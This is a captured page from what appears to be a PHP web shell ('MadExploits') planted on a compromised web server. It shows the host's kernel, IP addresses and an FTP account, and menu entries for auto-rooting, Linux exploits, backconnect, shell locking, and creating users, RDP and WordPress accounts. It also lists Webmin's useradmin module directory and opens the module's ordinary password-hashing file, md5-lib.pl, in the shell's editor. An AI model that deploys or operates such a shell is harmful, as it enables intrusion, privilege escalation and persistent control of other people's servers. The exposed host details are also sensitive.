Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
useradmin /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
5.66
KB
-rw-r--r--
acl_security.pl
13.74
KB
-rwxr-xr-x
aix-lib.pl
1.17
KB
-rwxr-xr-x
backup_config.pl
749
B
-rwxr-xr-x
batch_exec.cgi
17.21
KB
-rwxr-xr-x
batch_form.cgi
2.42
KB
-rwxr-xr-x
cgi_args.pl
477
B
-rwxr-xr-x
config-aix
703
B
-rw-r--r--
config-cobalt-linux
710
B
-rw-r--r--
config-coherent-linux
657
B
-rw-r--r--
config-corel-linux
665
B
-rw-r--r--
config-debian-linux
665
B
-rw-r--r--
config-freebsd
684
B
-rw-r--r--
config-generic-linux
677
B
-rw-r--r--
config-gentoo-linux
637
B
-rw-r--r--
config-hpux
579
B
-rw-r--r--
config-irix
757
B
-rw-r--r--
config-macos
581
B
-rw-r--r--
config-mandrake-linux
662
B
-rw-r--r--
config-msc-linux
657
B
-rw-r--r--
config-netbsd
623
B
-rw-r--r--
config-open-linux
687
B
-rw-r--r--
config-openSUSE-Linux-15.0-ALL
715
B
-rw-r--r--
config-openbsd
636
B
-rw-r--r--
config-openmamba-linux
657
B
-rw-r--r--
config-openserver
841
B
-rw-r--r--
config-osf1
579
B
-rw-r--r--
config-pardus-linux
665
B
-rw-r--r--
config-redhat-linux-15.0-ALL
659
B
-rw-r--r--
config-redhat-linux-ALL-14.9
657
B
-rw-r--r--
config-slackware-linux
663
B
-rw-r--r--
config-sol-linux
657
B
-rw-r--r--
config-solaris
631
B
-rw-r--r--
config-suse-linux
677
B
-rw-r--r--
config-suse-linux-9.0-ALL
715
B
-rw-r--r--
config-trustix-linux
657
B
-rw-r--r--
config-turbo-linux
677
B
-rw-r--r--
config-united-linux
677
B
-rw-r--r--
config-unixware
595
B
-rw-r--r--
config.info
4.05
KB
-rw-r--r--
config.info.bg
7.87
KB
-rw-r--r--
config.info.ca
4.82
KB
-rw-r--r--
config.info.cs
4.21
KB
-rw-r--r--
config.info.da
3.7
KB
-rw-r--r--
config.info.de
4.65
KB
-rw-r--r--
config.info.es
4.34
KB
-rw-r--r--
config.info.fa
6.04
KB
-rw-r--r--
config.info.fr
2.77
KB
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ja
4.96
KB
-rw-r--r--
config.info.nl
4.61
KB
-rw-r--r--
config.info.no
4.12
KB
-rw-r--r--
config.info.pl
3.01
KB
-rw-r--r--
config.info.pt_BR
4.36
KB
-rw-r--r--
config.info.ru
4.61
KB
-rw-r--r--
config.info.sv
1.06
KB
-rw-r--r--
config.info.tr
3.69
KB
-rw-r--r--
config.info.uk
4.58
KB
-rw-r--r--
config.info.zh
961
B
-rw-r--r--
config.info.zh_TW
909
B
-rw-r--r--
cpan_modules.pl
256
B
-rwxr-xr-x
defaultacl
358
B
-rw-r--r--
delete_group.cgi
2.18
KB
-rwxr-xr-x
delete_user.cgi
4.67
KB
-rwxr-xr-x
edit_group.cgi
4.97
KB
-rwxr-xr-x
edit_user.cgi
18.46
KB
-rwxr-xr-x
export_exec.cgi
2.9
KB
-rwxr-xr-x
export_form.cgi
1.77
KB
-rwxr-xr-x
freebsd-lib.pl
1.74
KB
-rwxr-xr-x
gbatch_exec.cgi
8.1
KB
-rwxr-xr-x
gbatch_form.cgi
1.59
KB
-rwxr-xr-x
gexport_exec.cgi
1.73
KB
-rwxr-xr-x
gexport_form.cgi
1.26
KB
-rwxr-xr-x
help.html
6.79
KB
-rw-r--r--
hpux-lib.pl
1.02
KB
-rwxr-xr-x
index.cgi
7.38
KB
-rwxr-xr-x
irix-lib.pl
1.09
KB
-rwxr-xr-x
linux-lib.pl
4.75
KB
-rwxr-xr-x
list_logins.cgi
1.55
KB
-rwxr-xr-x
list_who.cgi
945
B
-rwxr-xr-x
log_parser.pl
1.68
KB
-rwxr-xr-x
macos-lib.pl
3.15
KB
-rwxr-xr-x
mass_delete_group.cgi
2.41
KB
-rwxr-xr-x
mass_delete_user.cgi
7.65
KB
-rwxr-xr-x
md5-lib.pl
7.58
KB
-rwxr-xr-x
module.info
544
B
-rw-r--r--
module.info.af
0
B
-rw-r--r--
module.info.af.auto
155
B
-rw-r--r--
module.info.ar
173
B
-rw-r--r--
module.info.ar.auto
34
B
-rw-r--r--
module.info.be
0
B
-rw-r--r--
module.info.be.auto
247
B
-rw-r--r--
module.info.bg
0
B
-rw-r--r--
module.info.bg.auto
228
B
-rw-r--r--
module.info.ca
117
B
-rw-r--r--
module.info.ca.auto
27
B
-rw-r--r--
module.info.cs
30
B
-rw-r--r--
module.info.cs.auto
134
B
-rw-r--r--
module.info.da
27
B
-rw-r--r--
module.info.da.auto
116
B
-rw-r--r--
module.info.de
133
B
-rw-r--r--
module.info.de.auto
25
B
-rw-r--r--
module.info.el
0
B
-rw-r--r--
module.info.el.auto
258
B
-rw-r--r--
module.info.es
26
B
-rw-r--r--
module.info.es.auto
136
B
-rw-r--r--
module.info.eu
0
B
-rw-r--r--
module.info.eu.auto
175
B
-rw-r--r--
module.info.fa
0
B
-rw-r--r--
module.info.fa.auto
220
B
-rw-r--r--
module.info.fi
0
B
-rw-r--r--
module.info.fi.auto
156
B
-rw-r--r--
module.info.fr
32
B
-rw-r--r--
module.info.fr.auto
154
B
-rw-r--r--
module.info.he
0
B
-rw-r--r--
module.info.he.auto
182
B
-rw-r--r--
module.info.hr
0
B
-rw-r--r--
module.info.hr.auto
147
B
-rw-r--r--
module.info.hu
37
B
-rw-r--r--
module.info.hu.auto
156
B
-rw-r--r--
module.info.it
0
B
-rw-r--r--
module.info.it.auto
129
B
-rw-r--r--
module.info.ja
39
B
-rw-r--r--
module.info.ja.auto
175
B
-rw-r--r--
module.info.ko
29
B
-rw-r--r--
module.info.ko.auto
142
B
-rw-r--r--
module.info.lt
0
B
-rw-r--r--
module.info.lt.auto
166
B
-rw-r--r--
module.info.lv
0
B
-rw-r--r--
module.info.lv.auto
167
B
-rw-r--r--
module.info.ms
124
B
-rw-r--r--
module.info.ms.auto
26
B
-rw-r--r--
module.info.mt
0
B
-rw-r--r--
module.info.mt.auto
133
B
-rw-r--r--
module.info.nl
30
B
-rw-r--r--
module.info.nl.auto
123
B
-rw-r--r--
module.info.no
27
B
-rw-r--r--
module.info.no.auto
116
B
-rw-r--r--
module.info.pl
122
B
-rw-r--r--
module.info.pl.auto
31
B
-rw-r--r--
module.info.pt
30
B
-rw-r--r--
module.info.pt.auto
124
B
-rw-r--r--
module.info.pt_BR
30
B
-rw-r--r--
module.info.pt_BR.auto
130
B
-rw-r--r--
module.info.ro
0
B
-rw-r--r--
module.info.ro.auto
167
B
-rw-r--r--
module.info.ru
49
B
-rw-r--r--
module.info.ru.auto
208
B
-rw-r--r--
module.info.sk
0
B
-rw-r--r--
module.info.sk.auto
177
B
-rw-r--r--
module.info.sl
0
B
-rw-r--r--
module.info.sl.auto
163
B
-rw-r--r--
module.info.sv
31
B
-rw-r--r--
module.info.sv.auto
128
B
-rw-r--r--
module.info.th
0
B
-rw-r--r--
module.info.th.auto
260
B
-rw-r--r--
module.info.tr
31
B
-rw-r--r--
module.info.tr.auto
147
B
-rw-r--r--
module.info.uk
0
B
-rw-r--r--
module.info.uk.auto
247
B
-rw-r--r--
module.info.ur
0
B
-rw-r--r--
module.info.ur.auto
232
B
-rw-r--r--
module.info.vi
0
B
-rw-r--r--
module.info.vi.auto
177
B
-rw-r--r--
module.info.zh
24
B
-rw-r--r--
module.info.zh.auto
103
B
-rw-r--r--
module.info.zh_TW
30
B
-rw-r--r--
module.info.zh_TW.auto
109
B
-rw-r--r--
my_group_chooser.cgi
6.9
KB
-rwxr-xr-x
my_user_chooser.cgi
6.56
KB
-rwxr-xr-x
netbsd-lib.pl
1.74
KB
-rwxr-xr-x
openbsd-lib.pl
1.74
KB
-rwxr-xr-x
openserver-lib.pl
1.18
KB
-rwxr-xr-x
osf1-lib.pl
1.01
KB
-rwxr-xr-x
prefs.info
134
B
-rw-r--r--
rbac-mapping
190
B
-rw-r--r--
save_group.cgi
4.86
KB
-rwxr-xr-x
save_user.cgi
20.39
KB
-rwxr-xr-x
search_group.cgi
991
B
-rwxr-xr-x
search_user.cgi
1.33
KB
-rwxr-xr-x
solaris-lib.pl
1.78
KB
-rwxr-xr-x
unixware-lib.pl
1.13
KB
-rwxr-xr-x
user-lib.pl
71.71
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : md5-lib.pl
# Functions for MD5 and SHA1 password encryption use strict; use warnings; no warnings 'redefine'; no warnings 'uninitialized'; our %config; # check_md5() # Returns a perl module name if the needed perl module(s) for MD5 encryption # are not installed, or undef if they are sub check_md5 { # On some systems, the crypt function just works! return undef if (&unix_crypt_supports_md5()); # Try Perl modules eval "use MD5"; if (!$@) { eval "use Digest::MD5"; if ($@) { return "Digest::MD5"; } } return undef; } # encrypt_md5(string, [salt]) # Returns a string encrypted in MD5 format sub encrypt_md5 { my ($passwd, $salt) = @_; my $magic = '$1$'; if ($salt && $salt =~ /^\$1\$([^\$]+)/) { # Extract actual salt from already encrypted password $salt = $1; } if ($salt && $salt !~ /^[a-z0-9\/\.]{8}$/i) { # Non-MD5 salt $salt = undef; } $salt ||= substr(time(), -8); # Use built-in crypt support for MD5, if we can if (&unix_crypt_supports_md5()) { return crypt($passwd, $magic.$salt.'$xxxxxxxxxxxxxxxxxxxxxx'); } # Add the password, magic and salt my $cls = "MD5"; eval "use MD5"; if ($@) { $cls = "Digest::MD5"; eval "use Digest::MD5"; if ($@) { &error("Missing MD5 or Digest::MD5 perl modules"); } } my $ctx = eval "new $cls"; $ctx->add($passwd); $ctx->add($magic); $ctx->add($salt); # Add some more stuff from the hash of the password and salt my $ctx1 = eval "new $cls"; $ctx1->add($passwd); $ctx1->add($salt); $ctx1->add($passwd); my $final = $ctx1->digest(); for(my $pl=length($passwd); $pl>0; $pl-=16) { $ctx->add($pl > 16 ? $final : substr($final, 0, $pl)); } # This piece of code seems rather pointless, but it's in the C code that # does MD5 in PAM so it has to go in! my $j = 0; for(my $i=length($passwd); $i; $i >>= 1) { if ($i & 1) { $ctx->add("\0"); } else { $ctx->add(substr($passwd, $j, 1)); } } $final = $ctx->digest(); # This loop exists only to waste time for(my $i=0; $i<1000; $i++) { my $ctx1 = eval "new $cls"; $ctx1->add($i & 1 ? $passwd : $final); $ctx1->add($salt) if ($i % 3); $ctx1->add($passwd) if ($i % 7); $ctx1->add($i & 1 ? $final : $passwd); $final = $ctx1->digest(); } # Convert the 16-byte final string into a readable form my $rv = $magic.$salt.'$'; my @final = map { ord($_) } split(//, $final); my $l = ($final[ 0]<<16) + ($final[ 6]<<8) + $final[12]; $rv .= &to64($l, 4); $l = ($final[ 1]<<16) + ($final[ 7]<<8) + $final[13]; $rv .= &to64($l, 4); $l = ($final[ 2]<<16) + ($final[ 8]<<8) + $final[14]; $rv .= &to64($l, 4); $l = ($final[ 3]<<16) + ($final[ 9]<<8) + $final[15]; $rv .= &to64($l, 4); $l = ($final[ 4]<<16) + ($final[10]<<8) + $final[ 5]; $rv .= &to64($l, 4); $l = $final[11]; $rv .= &to64($l, 2); return $rv; } # unix_crypt_supports_md5() # Returns 1 if the built-in crypt() function can already do MD5 sub unix_crypt_supports_md5 { my $hash = '$1$A9wB3O18$zaZgqrEmb9VNltWTL454R/'; my $newhash = eval { crypt('test', $hash) }; return $newhash eq $hash; } our @itoa64 = split(//, "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"); sub to64 { my ($v, $n) = @_; my $r = ""; while(--$n >= 0) { $r .= $itoa64[$v & 0x3f]; $v >>= 6; } return $r; } sub check_sha1 { eval "use Digest::SHA1"; return undef if (!$@); eval "use Digest::SHA"; return undef if (!$@); return "Digest::SHA"; } # encrypt_sha1(password) # Encrypts a password in SHA1 format sub encrypt_sha1 { my ($pass) = @_; my $sh = eval "use Digest::SHA1 qw(sha1_base64);return sha1_base64(\$pass);"; if ($@) { $sh = eval "use Digest::SHA qw(sha1_base64);return sha1_base64(\$pass);"; } return "{SHA}$sh="; } # encrypt_sha1_hash(password, salt) # Hashes a combined salt+password with SHA1, and returns it in hex. Used on OSX sub encrypt_sha1_hash { my ($pass, $salt) = @_; # XXX not done yet?? } # check_blowfish() # Returns an missing Perl module if blowfish is not available, undef if OK sub check_blowfish { eval "use Crypt::Eksblowfish::Bcrypt"; return $@ ? "Crypt::Eksblowfish::Bcrypt" : undef; } # encrypt_blowfish(password, [salt]) # Returns a string encrypted in blowfish format, suitable for /etc/shadow sub encrypt_blowfish { my ($passwd, $salt) = @_; my ($plain, $base64) = ("", ""); eval "use Crypt::Eksblowfish::Bcrypt"; if ($salt && $salt !~ /^\$2a\$/) { # Invalid salt for Blowfish $salt = undef; } if (!$salt) { # Generate a 22-character base-64 format salt &seed_random(); while(length($base64) < 22) { $plain .= chr(int(rand()*96)+32); $base64 = Crypt::Eksblowfish::Bcrypt::en_base64($plain); } $base64 = substr($base64, 0, 22); $salt = '$2a$'.'08'.'$'.$base64; } return Crypt::Eksblowfish::Bcrypt::bcrypt($passwd, $salt); } # unix_crypt_supports_sha512() # Returns 1 if the built-in crypt() function can already do SHA512 sub unix_crypt_supports_sha512 { my $hash = '$6$Tk5o/GEE$zjvXhYf/dr5M7/jan3pgunkNrAsKmQO9r5O8sr/Cr1hFOLkWmsH4iE9hhqdmHwXd5Pzm4ubBWTEjtMeC.h5qv1'; my $newhash = eval { crypt('test', $hash) }; return $newhash eq $hash; } # check_sha512() # Returns undef if SHA512 hashing is supported, or an error message if not sub check_sha512 { return &unix_crypt_supports_sha512() ? undef : 'Crypt::SHA'; } # encrypt_sha512(password, [salt]) # Hashes a password, possibly with the given salt, with SHA512 sub encrypt_sha512 { my ($passwd, $salt) = @_; $salt ||= '$6$'.substr(time(), -8).'$'; return crypt($passwd, $salt); } # unix_crypt_supports_yescrypt() # Returns 1 if the built-in crypt() function can already do yescrypt sub unix_crypt_supports_yescrypt { my $hash = '$y$j9T$waHytoaqP/CEnKFroGn0S/$fxd5mVc2mBPUc3vv.cpqDckpwrWTyIm2iD4JfnVBi26'; my $newhash = eval { crypt('test', $hash) }; return $newhash eq $hash; } # check_yescrypt() # Returns undef if yescrypt hashing is supported, or an error message if not sub check_yescrypt { return &unix_crypt_supports_yescrypt() ? undef : 'Crypt::NaCl::Sodium'; } # encrypt_yescrypt(password, [salt]) # Hashes a password, possibly with the given salt, with yescrypt sub encrypt_yescrypt { my ($passwd, $salt) = @_; $salt ||= &substitute_pattern('$y$j9T$[A-Z]{4}.[a-zA-Z0-9]{16}.$[a-zA-Z0-9]{14}.[a-zA-Z0-9]{7}/[a-zA-Z0-9]{15}/[a-zA-Z0-9]{4}'); return crypt($passwd, $salt); } # validate_password(password, hash) # Compares a password with a hash to see if they match, returns 1 if so, # 0 otherwise. Tries all supported hashing schemes. sub validate_password { my ($passwd, $hash) = @_; # Classic Unix crypt my $chash = eval { local $main::error_must_die = 1; &unix_crypt($passwd, $hash); }; return 1 if ($chash eq $hash); # MD5 if (!&check_md5()) { my $mhash = &encrypt_md5($passwd, $hash); return 1 if ($mhash eq $hash); } # Blowfish if (!&check_blowfish()) { my $mhash = &encrypt_blowfish($passwd, $hash); return 1 if ($mhash eq $hash); } # SHA512 if (!&check_sha512()) { my $shash = &encrypt_sha512($passwd, $hash); return 1 if ($shash && $shash eq $hash); } # yescrypt if (!&check_yescrypt()) { my $shash = &encrypt_yescrypt($passwd, $hash); return 1 if ($shash && $shash eq $hash); } # Some other hashing, maybe supported by crypt my $ohash = eval { crypt($passwd, $hash) }; return 1 if ($ohash && $ohash eq $hash); return 0; } =head2 is_dictionary_word(word) Returns 1 if some file can be found in a dictionary words file =cut sub is_dictionary_word { my ($word) = @_; $word = lc($word); my @files; if ($config{'dict_file'}) { @files = split(/\s+/, $config{'dict_file'}); } else { @files = ( "/usr/share/dict/words", "/usr/share/dict/linux.words", "/usr/dict/words" ); } foreach my $f (@files) { my $found = 0; my $fh = "WORDS"; &open_readfile($fh, $f); while(<$fh>) { s/#.*//; s/\s//; if (lc($_) eq $word) { $found = 1; last; } } close($fh); return 1 if ($found); } return 0; } 1;
Close